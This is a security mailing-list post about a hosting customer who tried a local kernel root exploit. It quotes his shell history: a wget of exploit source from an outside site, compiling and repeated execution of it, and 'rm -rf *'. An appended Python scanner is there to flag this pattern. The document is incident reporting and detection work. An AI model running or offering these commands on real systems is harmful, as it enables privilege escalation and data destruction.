
[cobalt-security] Attempted inside job. A report.



Hi all,

I'm very much aware of server security and in fact it's part of the business. 
We also offer webhosting, mostly for friends, colleagues and for charity 
purposes.  

We usually don't give shell access to customers, except to a select few 
whom I trust to know what they're doing. Well, just today someone 
signed up for one of the biggest and most expensive webhosting packages we 
offer, and during the email exchange he asked for shell access through SSH.

I granted that request and tuned my IDS software a little. Just minutes after 
the setup email had been sent (credit card had checked out fine) I got paged 
with the following report from my IDS software:

WARNING: --COMPILER ACCESS by user XXXXX!---

And this is the .bash_history of that user:

users
wget
uname -a
wget http://www.securityinfos.com/hackcoza/exploits/os/linux/suse/7.1/epcs2.c
gcc -o e epcs2.c
./e
./e
./e
./e
./e
./e
rm -rf *
ls
exit

This is what epcs2.c is about:

* epcs2 (improved by lst [liquid@xxxxxxx])
* ~~~~~~~
* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18

That exploit is fixed in the Cobalt 2.2.16 kernels, so his attempt didn't 
work. I cross-checked it by downloading, compiling and testing this exploit. 


My advice:

- Never, ever give shell access to anyone.
- If you're still running a 2.2.14 kernel, hurry up and install the 
kernel patch from the Cobalt download page.


-- 

With best regards,

Michael Stauber
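The report above shows the classic sequence a local-root attempt leaves in a shell history: recon (users, uname -a), fetch of a .c file, compile, repeated execution (a race-condition exploit needs retries), then cleanup. The following is an added example, not the poster's IDS and not tied to any particular product: a small scanner that runs rules over history lines and flags the fetch -> compile -> repeated-exec chain as a whole rather than only "compiler access". The program lists, the retry threshold of 3 and the "benign" session are assumptions chosen for the illustration; the "reported" sample mirrors the history quoted in the post.

```python
"""Scan shell-history lines for the download/compile/run-exploit pattern.

Added illustration, not the original poster's IDS software. The program
lists, the retry threshold and the benign sample below are assumptions.
"""
import re
import shlex
from collections import Counter

# Program names treated as compiler/build tooling (assumed list).
COMPILERS = {"gcc", "cc", "g++", "c++", "make", "as", "ld", "tcc"}
# Programs used to pull files from remote hosts (assumed list).
FETCHERS = {"wget", "curl", "ftp", "lynx", "fetch"}
# Recon commands often run right before a local kernel exploit (assumed list).
RECON = {"uname", "users", "w", "who", "id"}
# Fetched file names that look like source or an exploit archive.
SOURCE_RE = re.compile(r"\.(c|cc|cpp|s|asm|sh|pl|tgz|tar\.gz)$", re.I)
# How many runs of the same ./binary count as "retrying an exploit" (assumed).
RETRY_THRESHOLD = 3

# History as quoted in the report above (same commands, same URL).
REPORTED_HISTORY = [
    "users",
    "wget",
    "uname -a",
    "wget http://www.securityinfos.com/hackcoza/exploits/os/linux/suse/7.1/epcs2.c",
    "gcc -o e epcs2.c",
    "./e", "./e", "./e", "./e", "./e", "./e",
    "rm -rf *",
    "ls",
    "exit",
]

# Constructed benign session of an ordinary hosting customer.
BENIGN_HISTORY = ["cd public_html", "vi index.html", "ls -la", "exit"]


def _argv(line):
    """Split a history line into argv; fall back to whitespace on bad quoting."""
    try:
        return shlex.split(line)
    except ValueError:
        return line.split()


def scan_history(lines):
    """Return (line_no, rule, command) findings for suspicious commands."""
    findings = []
    runs = Counter()  # how often each ./binary has been executed so far
    for line_no, raw in enumerate(lines, 1):
        line = raw.strip()
        argv = _argv(line) if line else []
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]  # basename, so /usr/bin/gcc == gcc
        if prog in COMPILERS:
            findings.append((line_no, "compiler", line))
        if prog in FETCHERS and any(SOURCE_RE.search(a) for a in argv[1:]):
            findings.append((line_no, "fetch-source", line))
        if prog in RECON:
            findings.append((line_no, "recon", line))
        if argv[0].startswith("./"):
            runs[argv[0]] += 1
            if runs[argv[0]] == RETRY_THRESHOLD:
                findings.append((line_no, "repeated-exec", line))
        if prog == "rm" and "-rf" in argv and "*" in argv:
            findings.append((line_no, "cleanup", line))
    return findings


def is_exploit_session(lines):
    """True when fetch-source, compiler and repeated-exec appear in that order."""
    first = {}
    for line_no, rule, _ in scan_history(lines):
        first.setdefault(rule, line_no)
    try:
        f, c, r = first["fetch-source"], first["compiler"], first["repeated-exec"]
    except KeyError:
        return False
    return f < c < r


if __name__ == "__main__":
    for name, hist in (("reported", REPORTED_HISTORY), ("benign", BENIGN_HISTORY)):
        print(f"== {name}: exploit session = {is_exploit_session(hist)}")
        for line_no, rule, cmd in scan_history(hist):
            print(f"  line {line_no:2d} [{rule}] {cmd}")
```

A lone compiler hit is noisy on a box where customers legitimately build things; chaining the rules in order is what separates the reported session from a developer compiling hello.c once. The same rules apply equally to an auditd or process-accounting feed, since the scanner only needs the command line of each execution.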